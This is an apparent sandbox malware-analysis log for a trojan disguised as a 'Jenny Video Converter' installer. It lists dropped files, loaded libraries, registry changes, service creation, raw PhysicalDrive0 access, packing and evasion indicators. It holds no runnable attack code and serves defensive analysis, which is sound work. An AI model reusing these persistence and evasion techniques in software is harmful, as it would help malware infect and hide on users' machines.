        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004455842_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004697702_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0048D8C42_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004519A82_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0043DD602_2_0043DD60
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBE0023_2_02DBE002
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBBCEB3_2_02DBBCEB
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBB4E53_2_02DBB4E5
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DBBD583_2_02DBBD58
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA53A03_2_02DA53A0
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9E18D3_2_02D9E18D
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D99E843_2_02D99E84
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA4E293_2_02DA4E29
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D8EFAD3_2_02D8EFAD
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9DC993_2_02D9DC99
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D984423_2_02D98442
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9AC3A3_2_02D9AC3A
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA2DB43_2_02DA2DB4
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D9E5A53_2_02D9E5A5
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp 25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: String function: 02DA5330 appears 139 times
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: String function: 02D98AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: String function: 004460B4 appears 59 times
        Source: N6jsQ3XNNX.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: N6jsQ3XNNX.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-SAKD7.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-FABCG.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-8J8L1.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-73S5T.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-GR40U.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-IR87B.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-S9SIF.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-CCK3H.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-7MVDI.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-DDT59.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-KK58F.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: is-D0HIN.tmp.2.drStatic PE information: Number of sections : 11 > 10
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs N6jsQ3XNNX.exe
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs N6jsQ3XNNX.exe
        Source: N6jsQ3XNNX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@6/69@2/3
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D908B8 FormatMessageA,GetLastError,3_2_02D908B8
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455DF8
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateServiceA,3_2_004027A0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0046E38C GetVersion,CoCreateInstance,2_2_0046E38C
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004027BE StartServiceCtrlDispatcherA,3_2_004027BE
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004027BE StartServiceCtrlDispatcherA,3_2_004027BE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeFile created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile read: C:\Windows\win.ini
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: N6jsQ3XNNX.exeVirustotal: Detection: 27%
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeFile read: C:\Users\user\Desktop\N6jsQ3XNNX.exe
        Source: unknownProcess created: C:\Users\user\Desktop\N6jsQ3XNNX.exe "C:\Users\user\Desktop\N6jsQ3XNNX.exe"
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp "C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeSection loaded: apphelp.dll
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: rstrtmgr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: dsound.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeSection loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Window found: window name: TMainForm
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jenny Video Converter_is1
        Source: N6jsQ3XNNX.exe | Static file information: File size 4512180 > 1048576

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Unpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack .text:EW;.rdata:R;_cde_2:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Unpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack
        Source: is-E27ND.tmp.2.dr | Static PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004502AC
        Source: jennyvideoconverter32_64.exe.2.dr | Static PE information: section name: _cde_2
        Source: is-R14KT.tmp.2.dr | Static PE information: section name: /4
        Source: is-GR40U.tmp.2.dr | Static PE information: section name: /4
        Source: is-IR87B.tmp.2.dr | Static PE information: section name: /4
        Source: is-R59QM.tmp.2.dr | Static PE information: section name: /4
        Source: is-G1ORK.tmp.2.dr | Static PE information: section name: /4
        Source: is-SBF1H.tmp.2.dr | Static PE information: section name: /4
        Source: is-DDT59.tmp.2.dr | Static PE information: section name: /4
        Source: is-E27ND.tmp.2.dr | Static PE information: section name: /4
        Source: is-0NOE7.tmp.2.dr | Static PE information: section name: /4
        Source: is-7MVDI.tmp.2.dr | Static PE information: section name: /4
        Source: is-3L92A.tmp.2.dr | Static PE information: section name: /4
        Source: is-8J8L1.tmp.2.dr | Static PE information: section name: /4
        Source: is-O680T.tmp.2.dr | Static PE information: section name: /4
        Source: is-CCK3H.tmp.2.dr | Static PE information: section name: /4
        Source: is-FABCG.tmp.2.dr | Static PE information: section name: /4
        Source: is-S9SIF.tmp.2.dr | Static PE information: section name: /4
        Source: is-KK58F.tmp.2.dr | Static PE information: section name: /4
        Source: is-I6MFQ.tmp.2.dr | Static PE information: section name: /4
        Source: is-D0HIN.tmp.2.dr | Static PE information: section name: /4
        Source: is-SPPOJ.tmp.2.dr | Static PE information: section name: /4
        Source: is-8FEA4.tmp.2.dr | Static PE information: section name: /4
        Source: is-MCN70.tmp.2.dr | Static PE information: section name: /4
        Source: is-P1MHN.tmp.2.dr | Static PE information: section name: /4
        Source: is-8PPAH.tmp.2.dr | Static PE information: section name: /4
        Source: is-19DMT.tmp.2.dr | Static PE information: section name: /4
        Source: is-73S5T.tmp.2.dr | Static PE information: section name: /4
        Source: is-AUN77.tmp.2.dr | Static PE information: section name: /4
        Source: ET Ammeter Side 10.7.45.exe.3.dr | Static PE information: section name: _cde_2
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00409954 push 00409991h; ret 2_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040A04F push ds; ret 2_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040A023 push ds; ret 2_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00460088 push ecx; mov dword ptr [esp], ecx 2_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004062CC push ecx; mov dword ptr [esp], eax 2_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0049467C push ecx; mov dword ptr [esp], ecx 2_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004106E0 push ecx; mov dword ptr [esp], edx 2_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00412938 push 0041299Bh; ret 2_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040D038 push ecx; mov dword ptr [esp], edx 2_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004850AC push ecx; mov dword ptr [esp], ecx 2_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00443450 push ecx; mov dword ptr [esp], ecx 2_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040546D push eax; ret 2_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040553D push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040F598 push ecx; mov dword ptr [esp], edx 2_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004055BE push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00459634 push 00459678h; ret 2_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0040563B push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004517E4 push 00451817h; ret 2_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004519A8 push ecx; mov dword ptr [esp], eax 2_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00483A08 push 00483AF7h; ret 2_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00477A24 push ecx; mov dword ptr [esp], edx 2_2_00477A25

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D8F7D6
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-SBF1H.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp
